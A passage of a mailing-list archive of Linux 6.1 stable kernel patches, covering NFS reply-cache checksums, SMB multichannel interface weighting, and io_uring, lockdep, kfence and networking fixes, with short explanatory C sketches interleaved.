++ * Compute a weak checksum of the leading bytes of an NFS procedure
++ * call header to help verify that a retransmitted Call matches an
++ * entry in the duplicate reply cache.
++ *
++ * To avoid assumptions about how the RPC message is laid out in
++ * @buf and what else it might contain (eg, a GSS MIC suffix), the
++ * caller passes us the exact location and length of the NFS Call
++ * header.
++ *
++ * Returns a 32-bit checksum value, as defined in RFC 793.
+  */
+-static __wsum
+-nfsd_cache_csum(struct svc_rqst *rqstp)
++static __wsum nfsd_cache_csum(struct xdr_buf *buf, unsigned int start,
++			      unsigned int remaining)
+ {
++	unsigned int base, len;
++	struct xdr_buf subbuf;
++	__wsum csum = 0;
++	void *p;
+ 	int idx;
+-	unsigned int base;
+-	__wsum csum;
+-	struct xdr_buf *buf = &rqstp->rq_arg;
+-	const unsigned char *p = buf->head[0].iov_base;
+-	size_t csum_len = min_t(size_t, buf->head[0].iov_len + buf->page_len,
+-				RC_CSUMLEN);
+-	size_t len = min(buf->head[0].iov_len, csum_len);
++
++	if (remaining > RC_CSUMLEN)
++		remaining = RC_CSUMLEN;
++	if (xdr_buf_subsegment(buf, &subbuf, start, remaining))
++		return csum;
+ 
+ 	/* rq_arg.head first */
+-	csum = csum_partial(p, len, 0);
+-	csum_len -= len;
++	if (subbuf.head[0].iov_len) {
++		len = min_t(unsigned int, subbuf.head[0].iov_len, remaining);
++		csum = csum_partial(subbuf.head[0].iov_base, len, csum);
++		remaining -= len;
++	}
+ 
+ 	/* Continue into page array */
+-	idx = buf->page_base / PAGE_SIZE;
+-	base = buf->page_base & ~PAGE_MASK;
+-	while (csum_len) {
+-		p = page_address(buf->pages[idx]) + base;
+-		len = min_t(size_t, PAGE_SIZE - base, csum_len);
++	idx = subbuf.page_base / PAGE_SIZE;
++	base = subbuf.page_base & ~PAGE_MASK;
++	while (remaining) {
++		p = page_address(subbuf.pages[idx]) + base;
++		len = min_t(unsigned int, PAGE_SIZE - base, remaining);
+ 		csum = csum_partial(p, len, csum);
+-		csum_len -= len;
++		remaining -= len;
+ 		base = 0;
+ 		++idx;
+ 	}
+@@ -408,6 +428,8 @@ out:
+ /**
+  * nfsd_cache_lookup - Find an entry in the duplicate reply cache
+  * @rqstp: Incoming Call to find
++ * @start: starting byte in @rqstp->rq_arg of the NFS Call header
++ * @len: size of the NFS Call header, in bytes
+  *
+  * Try to find an entry matching the current call in the cache. When none
+  * is found, we try to grab the oldest expired entry off the LRU list. If
+@@ -420,7 +442,8 @@ out:
+  *   %RC_REPLY: Reply from cache
+  *   %RC_DROPIT: Do not process the request further
+  */
+-int nfsd_cache_lookup(struct svc_rqst *rqstp)
++int nfsd_cache_lookup(struct svc_rqst *rqstp, unsigned int start,
++		      unsigned int len)
+ {
+ 	struct nfsd_net		*nn;
+ 	struct svc_cacherep	*rp, *found;
+@@ -435,7 +458,7 @@ int nfsd_cache_lookup(struct svc_rqst *rqstp)
+ 		goto out;
+ 	}
+ 
+-	csum = nfsd_cache_csum(rqstp);
++	csum = nfsd_cache_csum(&rqstp->rq_arg, start, len);
+ 
+ 	/*
+ 	 * Since the common case is a cache miss followed by an insert,
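
The reworked nfsd_cache_csum() above walks only the exact span of the NFS Call header, which may start partway into a segmented buffer. A self-contained sketch of that shape, using struct iovec segments and a plain byte sum standing in for csum_partial() (the names are assumptions for the example, not the nfsd API):

#include <stddef.h>
#include <stdint.h>
#include <sys/uio.h>

/* Sum at most 'limit' bytes of a segmented buffer, beginning 'start'
 * bytes in -- the same walk nfsd does over rq_arg's head and pages.
 */
static uint32_t segsum(const struct iovec *segs, int nsegs,
		       size_t start, size_t limit)
{
	uint32_t sum = 0;

	for (int i = 0; i < nsegs && limit; i++) {
		size_t len = segs[i].iov_len;
		const uint8_t *p;

		if (start >= len) {	/* segment entirely skipped */
			start -= len;
			continue;
		}
		p = (const uint8_t *)segs[i].iov_base + start;
		len -= start;
		start = 0;
		if (len > limit)	/* cap at the RC_CSUMLEN-style limit */
			len = limit;
		for (size_t j = 0; j < len; j++)
			sum += p[j];
		limit -= len;
	}
	return sum;
}
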
+diff --git a/fs/nfsd/nfssvc.c b/fs/nfsd/nfssvc.c
+index 6b20f285f3ca6..f6cc99af81925 100644
+--- a/fs/nfsd/nfssvc.c
++++ b/fs/nfsd/nfssvc.c
+@@ -1027,6 +1027,8 @@ out:
+ int nfsd_dispatch(struct svc_rqst *rqstp, __be32 *statp)
+ {
+ 	const struct svc_procedure *proc = rqstp->rq_procinfo;
++	unsigned int start, len;
++	__be32 *nfs_reply;
+ 
+ 	/*
+ 	 * Give the xdr decoder a chance to change this if it wants
+@@ -1035,10 +1037,18 @@ int nfsd_dispatch(struct svc_rqst *rqstp, __be32 *statp)
+ 	rqstp->rq_cachetype = proc->pc_cachetype;
+ 
+ 	svcxdr_init_decode(rqstp);
++
++	/*
++	 * ->pc_decode advances the argument stream past the NFS
++	 * Call header, so grab the header's starting location and
++	 * size now for the call to nfsd_cache_lookup().
++	 */
++	start = xdr_stream_pos(&rqstp->rq_arg_stream);
++	len = xdr_stream_remaining(&rqstp->rq_arg_stream);
+ 	if (!proc->pc_decode(rqstp, &rqstp->rq_arg_stream))
+ 		goto out_decode_err;
+ 
+-	switch (nfsd_cache_lookup(rqstp)) {
++	switch (nfsd_cache_lookup(rqstp, start, len)) {
+ 	case RC_DOIT:
+ 		break;
+ 	case RC_REPLY:
+@@ -1053,6 +1063,7 @@ int nfsd_dispatch(struct svc_rqst *rqstp, __be32 *statp)
+ 	 */
+ 	svcxdr_init_encode(rqstp);
+ 
++	nfs_reply = xdr_inline_decode(&rqstp->rq_res_stream, 0);
+ 	*statp = proc->pc_func(rqstp);
+ 	if (*statp == rpc_drop_reply || test_bit(RQ_DROPME, &rqstp->rq_flags))
+ 		goto out_update_drop;
+@@ -1060,7 +1071,7 @@ int nfsd_dispatch(struct svc_rqst *rqstp, __be32 *statp)
+ 	if (!proc->pc_encode(rqstp, &rqstp->rq_res_stream))
+ 		goto out_encode_err;
+ 
+-	nfsd_cache_update(rqstp, rqstp->rq_cachetype, statp + 1);
++	nfsd_cache_update(rqstp, rqstp->rq_cachetype, nfs_reply);
+ out_cached_reply:
+ 	return 1;
+ 
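
The nfsd_dispatch() change above captures the argument stream's position and remaining length before ->pc_decode consumes the header, so the cache lookup can checksum exactly that span. A small illustrative cursor sketch of the same ordering (the callback signatures are invented for the example):

#include <stddef.h>
#include <stdint.h>

struct stream { const uint8_t *buf; size_t pos, len; };

static int dispatch(struct stream *s,
		    int (*decode)(struct stream *),
		    uint32_t (*csum)(const uint8_t *, size_t))
{
	size_t start = s->pos;		/* header start, pre-decode */
	size_t remaining = s->len - s->pos;
	uint32_t key;

	if (!decode(s))			/* advances s->pos past the header */
		return -1;
	key = csum(s->buf + start, remaining);
	(void)key;			/* would feed the DRC lookup */
	return 0;
}
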
+diff --git a/fs/smb/client/cifs_debug.c b/fs/smb/client/cifs_debug.c
+index ed396b186c5a4..0acb455368f23 100644
+--- a/fs/smb/client/cifs_debug.c
++++ b/fs/smb/client/cifs_debug.c
+@@ -220,6 +220,8 @@ static int cifs_debug_data_proc_show(struct seq_file *m, void *v)
+ 	struct cifs_ses *ses;
+ 	struct cifs_tcon *tcon;
+ 	struct cifs_server_iface *iface;
++	size_t iface_weight = 0, iface_min_speed = 0;
++	struct cifs_server_iface *last_iface = NULL;
+ 	int c, i, j;
+ 
+ 	seq_puts(m,
+@@ -457,13 +459,29 @@ skip_rdma:
+ 
+ 			spin_lock(&ses->iface_lock);
+ 			if (ses->iface_count)
+-				seq_printf(m, "\n\n\tServer interfaces: %zu",
+-					   ses->iface_count);
++				seq_printf(m, "\n\n\tServer interfaces: %zu"
++					   "\tLast updated: %lu seconds ago",
++					   ses->iface_count,
++					   (jiffies - ses->iface_last_update) / HZ);
++
++			last_iface = list_last_entry(&ses->iface_list,
++						     struct cifs_server_iface,
++						     iface_head);
++			iface_min_speed = last_iface->speed;
++
+ 			j = 0;
+ 			list_for_each_entry(iface, &ses->iface_list,
+ 						 iface_head) {
+ 				seq_printf(m, "\n\t%d)", ++j);
+ 				cifs_dump_iface(m, iface);
++
++				iface_weight = iface->speed / iface_min_speed;
++				seq_printf(m, "\t\tWeight (cur,total): (%zu,%zu)"
++					   "\n\t\tAllocated channels: %u\n",
++					   iface->weight_fulfilled,
++					   iface_weight,
++					   iface->num_channels);
++
+ 				if (is_ses_using_iface(ses, iface))
+ 					seq_puts(m, "\t\t[CONNECTED]\n");
+ 			}
+diff --git a/fs/smb/client/cifs_ioctl.h b/fs/smb/client/cifs_ioctl.h
+index d86d78d5bfdc1..26327442e383b 100644
+--- a/fs/smb/client/cifs_ioctl.h
++++ b/fs/smb/client/cifs_ioctl.h
+@@ -26,6 +26,11 @@ struct smb_mnt_fs_info {
+ 	__u64   cifs_posix_caps;
+ } __packed;
+ 
++struct smb_mnt_tcon_info {
++	__u32	tid;
++	__u64	session_id;
++} __packed;
++
+ struct smb_snapshot_array {
+ 	__u32	number_of_snapshots;
+ 	__u32	number_of_snapshots_returned;
+@@ -108,7 +113,8 @@ struct smb3_notify_info {
+ #define CIFS_IOC_NOTIFY _IOW(CIFS_IOCTL_MAGIC, 9, struct smb3_notify)
+ #define CIFS_DUMP_FULL_KEY _IOWR(CIFS_IOCTL_MAGIC, 10, struct smb3_full_key_debug_info)
+ #define CIFS_IOC_NOTIFY_INFO _IOWR(CIFS_IOCTL_MAGIC, 11, struct smb3_notify_info)
+-#define CIFS_IOC_SHUTDOWN _IOR ('X', 125, __u32)
++#define CIFS_IOC_GET_TCON_INFO _IOR(CIFS_IOCTL_MAGIC, 12, struct smb_mnt_tcon_info)
++#define CIFS_IOC_SHUTDOWN _IOR('X', 125, __u32)
+ 
+ /*
+  * Flags for going down operation
+diff --git a/fs/smb/client/cifsfs.h b/fs/smb/client/cifsfs.h
+index b6c38896fb2db..a1d8791c4fcd2 100644
+--- a/fs/smb/client/cifsfs.h
++++ b/fs/smb/client/cifsfs.h
+@@ -105,8 +105,8 @@ extern int cifs_lock(struct file *, int, struct file_lock *);
+ extern int cifs_fsync(struct file *, loff_t, loff_t, int);
+ extern int cifs_strict_fsync(struct file *, loff_t, loff_t, int);
+ extern int cifs_flush(struct file *, fl_owner_t id);
+-extern int cifs_file_mmap(struct file * , struct vm_area_struct *);
+-extern int cifs_file_strict_mmap(struct file * , struct vm_area_struct *);
++extern int cifs_file_mmap(struct file *file, struct vm_area_struct *vma);
++extern int cifs_file_strict_mmap(struct file *file, struct vm_area_struct *vma);
+ extern const struct file_operations cifs_dir_ops;
+ extern int cifs_dir_open(struct inode *inode, struct file *file);
+ extern int cifs_readdir(struct file *file, struct dir_context *ctx);
+diff --git a/fs/smb/client/cifsglob.h b/fs/smb/client/cifsglob.h
+index 39602f39aea8f..2e814eadd6aef 100644
+--- a/fs/smb/client/cifsglob.h
++++ b/fs/smb/client/cifsglob.h
+@@ -788,6 +788,7 @@ static inline unsigned int
+ in_flight(struct TCP_Server_Info *server)
+ {
+ 	unsigned int num;
++
+ 	spin_lock(&server->req_lock);
+ 	num = server->in_flight;
+ 	spin_unlock(&server->req_lock);
+@@ -798,6 +799,7 @@ static inline bool
+ has_credits(struct TCP_Server_Info *server, int *credits, int num_credits)
+ {
+ 	int num;
++
+ 	spin_lock(&server->req_lock);
+ 	num = *credits;
+ 	spin_unlock(&server->req_lock);
+@@ -954,6 +956,8 @@ struct cifs_server_iface {
+ 	struct list_head iface_head;
+ 	struct kref refcount;
+ 	size_t speed;
++	size_t weight_fulfilled;
++	unsigned int num_channels;
+ 	unsigned int rdma_capable : 1;
+ 	unsigned int rss_capable : 1;
+ 	unsigned int is_active : 1; /* unset if non existent */
+@@ -991,7 +995,7 @@ struct cifs_ses {
+ 	struct TCP_Server_Info *server;	/* pointer to server info */
+ 	int ses_count;		/* reference counter */
+ 	enum ses_status_enum ses_status;  /* updates protected by cifs_tcp_ses_lock */
+-	unsigned overrideSecFlg;  /* if non-zero override global sec flags */
++	unsigned int overrideSecFlg; /* if non-zero override global sec flags */
+ 	char *serverOS;		/* name of operating system underlying server */
+ 	char *serverNOS;	/* name of network operating system of server */
+ 	char *serverDomain;	/* security realm of server */
+@@ -1347,7 +1351,7 @@ struct cifsFileInfo {
+ 	__u32 pid;		/* process id who opened file */
+ 	struct cifs_fid fid;	/* file id from remote */
+ 	struct list_head rlist; /* reconnect list */
+-	/* BB add lock scope info here if needed */ ;
++	/* BB add lock scope info here if needed */
+ 	/* lock scope id (0 if none) */
+ 	struct dentry *dentry;
+ 	struct tcon_link *tlink;
+@@ -1735,6 +1739,7 @@ static inline void free_dfs_info_array(struct dfs_info3_param *param,
+ 				       int number_of_items)
+ {
+ 	int i;
++
+ 	if ((number_of_items == 0) || (param == NULL))
+ 		return;
+ 	for (i = 0; i < number_of_items; i++) {
+diff --git a/fs/smb/client/connect.c b/fs/smb/client/connect.c
+index 6ca1e00b3f76a..5b19918938346 100644
+--- a/fs/smb/client/connect.c
++++ b/fs/smb/client/connect.c
+@@ -2070,6 +2070,12 @@ void cifs_put_smb_ses(struct cifs_ses *ses)
+ 		}
+ 	}
+ 
++	/* we now account for primary channel in iface->refcount */
++	if (ses->chans[0].iface) {
++		kref_put(&ses->chans[0].iface->refcount, release_iface);
++		ses->chans[0].server = NULL;
++	}
++
+ 	sesInfoFree(ses);
+ 	cifs_put_tcp_session(server, 0);
+ }
+diff --git a/fs/smb/client/ioctl.c b/fs/smb/client/ioctl.c
+index 6419ec47c2a85..ae9905e2b9d4a 100644
+--- a/fs/smb/client/ioctl.c
++++ b/fs/smb/client/ioctl.c
+@@ -117,6 +117,20 @@ out_drop_write:
+ 	return rc;
+ }
+ 
++static long smb_mnt_get_tcon_info(struct cifs_tcon *tcon, void __user *arg)
++{
++	int rc = 0;
++	struct smb_mnt_tcon_info tcon_inf;
++
++	tcon_inf.tid = tcon->tid;
++	tcon_inf.session_id = tcon->ses->Suid;
++
++	if (copy_to_user(arg, &tcon_inf, sizeof(struct smb_mnt_tcon_info)))
++		rc = -EFAULT;
++
++	return rc;
++}
++
+ static long smb_mnt_get_fsinfo(unsigned int xid, struct cifs_tcon *tcon,
+ 				void __user *arg)
+ {
+@@ -410,6 +424,17 @@ long cifs_ioctl(struct file *filep, unsigned int command, unsigned long arg)
+ 			tcon = tlink_tcon(pSMBFile->tlink);
+ 			rc = smb_mnt_get_fsinfo(xid, tcon, (void __user *)arg);
+ 			break;
++		case CIFS_IOC_GET_TCON_INFO:
++			cifs_sb = CIFS_SB(inode->i_sb);
++			tlink = cifs_sb_tlink(cifs_sb);
++			if (IS_ERR(tlink)) {
++				rc = PTR_ERR(tlink);
++				break;
++			}
++			tcon = tlink_tcon(tlink);
++			rc = smb_mnt_get_tcon_info(tcon, (void __user *)arg);
++			cifs_put_tlink(tlink);
++			break;
+ 		case CIFS_ENUMERATE_SNAPSHOTS:
+ 			if (pSMBFile == NULL)
+ 				break;
+diff --git a/fs/smb/client/sess.c b/fs/smb/client/sess.c
+index f0d164873500b..634035bcb9347 100644
+--- a/fs/smb/client/sess.c
++++ b/fs/smb/client/sess.c
+@@ -164,7 +164,9 @@ int cifs_try_adding_channels(struct cifs_sb_info *cifs_sb, struct cifs_ses *ses)
+ 	int left;
+ 	int rc = 0;
+ 	int tries = 0;
++	size_t iface_weight = 0, iface_min_speed = 0;
+ 	struct cifs_server_iface *iface = NULL, *niface = NULL;
++	struct cifs_server_iface *last_iface = NULL;
+ 
+ 	spin_lock(&ses->chan_lock);
+ 
+@@ -192,21 +194,11 @@ int cifs_try_adding_channels(struct cifs_sb_info *cifs_sb, struct cifs_ses *ses)
+ 	}
+ 	spin_unlock(&ses->chan_lock);
+ 
+-	/*
+-	 * Keep connecting to same, fastest, iface for all channels as
+-	 * long as its RSS. Try next fastest one if not RSS or channel
+-	 * creation fails.
+-	 */
+-	spin_lock(&ses->iface_lock);
+-	iface = list_first_entry(&ses->iface_list, struct cifs_server_iface,
+-				 iface_head);
+-	spin_unlock(&ses->iface_lock);
+-
+ 	while (left > 0) {
+ 
+ 		tries++;
+ 		if (tries > 3*ses->chan_max) {
+-			cifs_dbg(FYI, "too many channel open attempts (%d channels left to open)\n",
++			cifs_dbg(VFS, "too many channel open attempts (%d channels left to open)\n",
+ 				 left);
+ 			break;
+ 		}
+@@ -214,17 +206,35 @@ int cifs_try_adding_channels(struct cifs_sb_info *cifs_sb, struct cifs_ses *ses)
+ 		spin_lock(&ses->iface_lock);
+ 		if (!ses->iface_count) {
+ 			spin_unlock(&ses->iface_lock);
++			cifs_dbg(VFS, "server %s does not advertise interfaces\n",
++				      ses->server->hostname);
+ 			break;
+ 		}
+ 
++		if (!iface)
++			iface = list_first_entry(&ses->iface_list, struct cifs_server_iface,
++						 iface_head);
++		last_iface = list_last_entry(&ses->iface_list, struct cifs_server_iface,
++					     iface_head);
++		iface_min_speed = last_iface->speed;
++
+ 		list_for_each_entry_safe_from(iface, niface, &ses->iface_list,
+ 				    iface_head) {
++			/* do not mix rdma and non-rdma interfaces */
++			if (iface->rdma_capable != ses->server->rdma)
++				continue;
++
+ 			/* skip ifaces that are unusable */
+ 			if (!iface->is_active ||
+ 			    (is_ses_using_iface(ses, iface) &&
+-			     !iface->rss_capable)) {
++			     !iface->rss_capable))
++				continue;
++
++			/* check if we already allocated enough channels */
++			iface_weight = iface->speed / iface_min_speed;
++
++			if (iface->weight_fulfilled >= iface_weight)
+ 				continue;
+-			}
+ 
+ 			/* take ref before unlock */
+ 			kref_get(&iface->refcount);
+@@ -241,10 +251,21 @@ int cifs_try_adding_channels(struct cifs_sb_info *cifs_sb, struct cifs_ses *ses)
+ 				continue;
+ 			}
+ 
+-			cifs_dbg(FYI, "successfully opened new channel on iface:%pIS\n",
++			iface->num_channels++;
++			iface->weight_fulfilled++;
++			cifs_dbg(VFS, "successfully opened new channel on iface:%pIS\n",
+ 				 &iface->sockaddr);
+ 			break;
+ 		}
++
++		/* reached end of list. reset weight_fulfilled and start over */
++		if (list_entry_is_head(iface, &ses->iface_list, iface_head)) {
++			list_for_each_entry(iface, &ses->iface_list, iface_head)
++				iface->weight_fulfilled = 0;
++			spin_unlock(&ses->iface_lock);
++			iface = NULL;
++			continue;
++		}
+ 		spin_unlock(&ses->iface_lock);
+ 
+ 		left--;
+@@ -263,8 +284,11 @@ int
+ cifs_chan_update_iface(struct cifs_ses *ses, struct TCP_Server_Info *server)
+ {
+ 	unsigned int chan_index;
++	size_t iface_weight = 0, iface_min_speed = 0;
+ 	struct cifs_server_iface *iface = NULL;
+ 	struct cifs_server_iface *old_iface = NULL;
++	struct cifs_server_iface *last_iface = NULL;
++	struct sockaddr_storage ss;
+ 	int rc = 0;
+ 
+ 	spin_lock(&ses->chan_lock);
+@@ -283,14 +307,49 @@ cifs_chan_update_iface(struct cifs_ses *ses, struct TCP_Server_Info *server)
+ 	}
+ 	spin_unlock(&ses->chan_lock);
+ 
++	spin_lock(&server->srv_lock);
++	ss = server->dstaddr;
++	spin_unlock(&server->srv_lock);
++
+ 	spin_lock(&ses->iface_lock);
++	if (!ses->iface_count) {
++		spin_unlock(&ses->iface_lock);
++		cifs_dbg(VFS, "server %s does not advertise interfaces\n", ses->server->hostname);
++		return 0;
++	}
++
++	last_iface = list_last_entry(&ses->iface_list, struct cifs_server_iface,
++				     iface_head);
++	iface_min_speed = last_iface->speed;
++
+ 	/* then look for a new one */
+ 	list_for_each_entry(iface, &ses->iface_list, iface_head) {
++		if (!chan_index) {
++			/* if we're trying to get the updated iface for primary channel */
++			if (!cifs_match_ipaddr((struct sockaddr *) &ss,
++					       (struct sockaddr *) &iface->sockaddr))
++				continue;
++
++			kref_get(&iface->refcount);
++			break;
++		}
++
++		/* do not mix rdma and non-rdma interfaces */
++		if (iface->rdma_capable != server->rdma)
++			continue;
++
+ 		if (!iface->is_active ||
+ 		    (is_ses_using_iface(ses, iface) &&
+ 		     !iface->rss_capable)) {
+ 			continue;
+ 		}
++
++		/* check if we already allocated enough channels */
++		iface_weight = iface->speed / iface_min_speed;
++
++		if (iface->weight_fulfilled >= iface_weight)
++			continue;
++
+ 		kref_get(&iface->refcount);
+ 		break;
+ 	}
+@@ -301,16 +360,41 @@ cifs_chan_update_iface(struct cifs_ses *ses, struct TCP_Server_Info *server)
+ 		cifs_dbg(FYI, "unable to find a suitable iface\n");
+ 	}
+ 
++	if (!chan_index && !iface) {
++		cifs_dbg(FYI, "unable to get the interface matching: %pIS\n",
++			 &ss);
++		spin_unlock(&ses->iface_lock);
++		return 0;
++	}
++
+ 	/* now drop the ref to the current iface */
+ 	if (old_iface && iface) {
+ 		cifs_dbg(FYI, "replacing iface: %pIS with %pIS\n",
+ 			 &old_iface->sockaddr,
+ 			 &iface->sockaddr);
++
++		old_iface->num_channels--;
++		if (old_iface->weight_fulfilled)
++			old_iface->weight_fulfilled--;
++		iface->num_channels++;
++		iface->weight_fulfilled++;
++
+ 		kref_put(&old_iface->refcount, release_iface);
+ 	} else if (old_iface) {
+ 		cifs_dbg(FYI, "releasing ref to iface: %pIS\n",
+ 			 &old_iface->sockaddr);
++
++		old_iface->num_channels--;
++		if (old_iface->weight_fulfilled)
++			old_iface->weight_fulfilled--;
++
+ 		kref_put(&old_iface->refcount, release_iface);
++	} else if (!chan_index) {
++		/* special case: update interface for primary channel */
++		cifs_dbg(FYI, "referencing primary channel iface: %pIS\n",
++			 &iface->sockaddr);
++		iface->num_channels++;
++		iface->weight_fulfilled++;
+ 	} else {
+ 		WARN_ON(!iface);
+ 		cifs_dbg(FYI, "adding new iface: %pIS\n", &iface->sockaddr);
+diff --git a/fs/smb/client/smb2ops.c b/fs/smb/client/smb2ops.c
+index 2c1898803279a..4cc56e4695fbc 100644
+--- a/fs/smb/client/smb2ops.c
++++ b/fs/smb/client/smb2ops.c
+@@ -752,6 +752,7 @@ SMB3_request_interfaces(const unsigned int xid, struct cifs_tcon *tcon, bool in_
+ 	unsigned int ret_data_len = 0;
+ 	struct network_interface_info_ioctl_rsp *out_buf = NULL;
+ 	struct cifs_ses *ses = tcon->ses;
++	struct TCP_Server_Info *pserver;
+ 
+ 	/* do not query too frequently */
+ 	if (ses->iface_last_update &&
+@@ -776,6 +777,11 @@ SMB3_request_interfaces(const unsigned int xid, struct cifs_tcon *tcon, bool in_
+ 	if (rc)
+ 		goto out;
+ 
++	/* check if iface is still active */
++	pserver = ses->chans[0].server;
++	if (pserver && !cifs_chan_is_iface_active(ses, pserver))
++		cifs_chan_update_iface(ses, pserver);
++
+ out:
+ 	kfree(out_buf);
+ 	return rc;
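
The cifs changes above spread channels across server interfaces in proportion to speed: each interface gets speed/min_speed slots, and when every interface is full the fulfillment counters reset and allocation starts over. A minimal sketch of that selection loop, assuming min_speed is the slowest advertised speed (so every weight is at least 1) and a non-empty array; the real code walks a list under ses->iface_lock and also filters on RDMA capability and activity:

#include <stddef.h>

struct iface { size_t speed, fulfilled; };

static struct iface *pick_iface(struct iface *ifs, int n, size_t min_speed)
{
	for (;;) {
		for (int i = 0; i < n; i++) {
			size_t weight = ifs[i].speed / min_speed;

			if (ifs[i].fulfilled < weight) {
				ifs[i].fulfilled++;	/* claim a slot */
				return &ifs[i];
			}
		}
		/* All interfaces carried their share: reset and loop. */
		for (int i = 0; i < n; i++)
			ifs[i].fulfilled = 0;
	}
}
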
+diff --git a/include/linux/hid.h b/include/linux/hid.h
+index 58f5ab29c11a7..b688069b17944 100644
+--- a/include/linux/hid.h
++++ b/include/linux/hid.h
+@@ -653,10 +653,13 @@ struct hid_device {							/* device report descriptor */
+ 	struct list_head debug_list;
+ 	spinlock_t  debug_list_lock;
+ 	wait_queue_head_t debug_wait;
++	struct kref			ref;
+ 
+ 	unsigned int id;						/* system unique id */
+ };
+ 
++void hiddev_free(struct kref *ref);
++
+ #define to_hid_device(pdev) \
+ 	container_of(pdev, struct hid_device, dev)
+ 
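
The hid.h hunk above adds a kref so the device structure is freed only when the last user drops its reference, not at unregister time. A userspace sketch of that lifetime pattern with C11 atomics (hiddev_free()'s real body lives elsewhere in the series; this shows only the general shape):

#include <stdatomic.h>
#include <stdlib.h>

struct dev {
	atomic_int ref;
	/* ... device state ... */
};

static struct dev *dev_get(struct dev *d)
{
	atomic_fetch_add(&d->ref, 1);
	return d;
}

static void dev_put(struct dev *d)
{
	/* fetch_sub returns the prior value: 1 means last reference. */
	if (atomic_fetch_sub(&d->ref, 1) == 1)
		free(d);
}
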
+diff --git a/io_uring/fs.c b/io_uring/fs.c
+index 27676e0150049..abf4295db0caf 100644
+--- a/io_uring/fs.c
++++ b/io_uring/fs.c
+@@ -254,7 +254,7 @@ int io_linkat_prep(struct io_kiocb *req, const struct io_uring_sqe *sqe)
+ 	newf = u64_to_user_ptr(READ_ONCE(sqe->addr2));
+ 	lnk->flags = READ_ONCE(sqe->hardlink_flags);
+ 
+-	lnk->oldpath = getname(oldf);
++	lnk->oldpath = getname_uflags(oldf, lnk->flags);
+ 	if (IS_ERR(lnk->oldpath))
+ 		return PTR_ERR(lnk->oldpath);
+ 
+diff --git a/io_uring/rsrc.c b/io_uring/rsrc.c
+index cce95164204f3..7ada0339b3870 100644
+--- a/io_uring/rsrc.c
++++ b/io_uring/rsrc.c
+@@ -1351,7 +1351,7 @@ int io_import_fixed(int ddir, struct iov_iter *iter,
+ 		 */
+ 		const struct bio_vec *bvec = imu->bvec;
+ 
+-		if (offset <= bvec->bv_len) {
++		if (offset < bvec->bv_len) {
+ 			iov_iter_advance(iter, offset);
+ 		} else {
+ 			unsigned long seg_skip;
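
The one-character io_uring fix above matters when the import offset equals the first bvec's length: with '<=' the cursor stayed in segment 0, pointing one byte past its end, while '<' forces advancement into the next segment. A sketch of the corrected seek, assuming the offset lies strictly within the buffer's total length:

#include <stddef.h>

struct seg { size_t len; };

static void seek(const struct seg *segs, size_t offset,
		 size_t *idx, size_t *off)
{
	size_t i = 0;

	/* '>=' here is the same boundary as the driver's '<': an offset
	 * equal to a segment's length belongs to the next segment.
	 */
	while (offset >= segs[i].len) {
		offset -= segs[i].len;
		i++;
	}
	*idx = i;
	*off = offset;
}
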
+diff --git a/kernel/locking/lockdep.c b/kernel/locking/lockdep.c
+index 0224b0329d011..3b38303ed27b3 100644
+--- a/kernel/locking/lockdep.c
++++ b/kernel/locking/lockdep.c
+@@ -3453,7 +3453,8 @@ static int alloc_chain_hlocks(int req)
+ 		size = chain_block_size(curr);
+ 		if (likely(size >= req)) {
+ 			del_chain_block(0, size, chain_block_next(curr));
+-			add_chain_block(curr + req, size - req);
++			if (size > req)
++				add_chain_block(curr + req, size - req);
+ 			return curr;
+ 		}
+ 	}
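
The lockdep fix above avoids returning a zero-size remainder to the free list when a chain block exactly matches the request. A tiny illustrative allocator showing the same guard:

struct freeblk { int base, size; };

static int take(struct freeblk *b, int req, void (*add_free)(int, int))
{
	int base = b->base;

	if (b->size < req)
		return -1;
	if (b->size > req)		/* only a non-empty remainder */
		add_free(base + req, b->size - req);
	b->size = 0;			/* block fully consumed */
	return base;
}
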
+diff --git a/mm/kfence/core.c b/mm/kfence/core.c
+index a477b7fb8aa33..c597cfebb0e86 100644
+--- a/mm/kfence/core.c
++++ b/mm/kfence/core.c
+@@ -828,6 +828,10 @@ void __init kfence_alloc_pool(void)
+ 	if (!kfence_sample_interval)
+ 		return;
+ 
++	/* if the pool has already been initialized by arch, skip the below. */
++	if (__kfence_pool)
++		return;
++
+ 	__kfence_pool = memblock_alloc(KFENCE_POOL_SIZE, PAGE_SIZE);
+ 
+ 	if (!__kfence_pool)
+diff --git a/net/ipv4/route.c b/net/ipv4/route.c
+index 9cbaae4f5ee71..474f391fab35d 100644
+--- a/net/ipv4/route.c
++++ b/net/ipv4/route.c
+@@ -780,7 +780,7 @@ static void __ip_do_redirect(struct rtable *rt, struct sk_buff *skb, struct flow
+ 			goto reject_redirect;
+ 	}
+ 
+-	n = __ipv4_neigh_lookup(rt->dst.dev, new_gw);
++	n = __ipv4_neigh_lookup(rt->dst.dev, (__force u32)new_gw);
+ 	if (!n)
+ 		n = neigh_create(&arp_tbl, &new_gw, rt->dst.dev);
+ 	if (!IS_ERR(n)) {
+diff --git a/net/smc/af_smc.c b/net/smc/af_smc.c
+index d676119984c09..b6609527dff62 100644
+--- a/net/smc/af_smc.c
++++ b/net/smc/af_smc.c
+@@ -585,8 +585,12 @@ static int smcr_clnt_conf_first_link(struct smc_sock *smc)
+ 	struct smc_llc_qentry *qentry;
+ 	int rc;
+ 
+-	/* receive CONFIRM LINK request from server over RoCE fabric */
+-	qentry = smc_llc_wait(link->lgr, NULL, SMC_LLC_WAIT_TIME,
++	/* Receive CONFIRM LINK request from server over RoCE fabric.
++	 * Increasing the client's timeout by twice as much as the server's
++	 * timeout by default can temporarily avoid decline messages of
++	 * both sides crossing or colliding
++	 */
++	qentry = smc_llc_wait(link->lgr, NULL, 2 * SMC_LLC_WAIT_TIME,
+ 			      SMC_LLC_CONFIRM_LINK);
+ 	if (!qentry) {
+ 		struct smc_clc_msg_decline dclc;


* [gentoo-commits] proj/linux-patches:6.1 commit in: /
@ 2024-09-30 16:04 Mike Pagano
From: Mike Pagano @ 2024-09-30 16:04 UTC (permalink / raw
  To: gentoo-commits

commit:     53ee6518419336cae4db66bc8f48277f982eb2aa
Author:     Mike Pagano <mpagano <AT> gentoo <DOT> org>
AuthorDate: Mon Sep 30 16:04:37 2024 +0000
Commit:     Mike Pagano <mpagano <AT> gentoo <DOT> org>
CommitDate: Mon Sep 30 16:04:37 2024 +0000
URL:        https://gitweb.gentoo.org/proj/linux-patches.git/commit/?id=53ee6518

Linux patch 6.1.112

Signed-off-by: Mike Pagano <mpagano <AT> gentoo.org>

 0000_README              |    4 +
 1111_linux-6.1.112.patch | 3769 ++++++++++++++++++++++++++++++++++++++++++++++
 2 files changed, 3773 insertions(+)

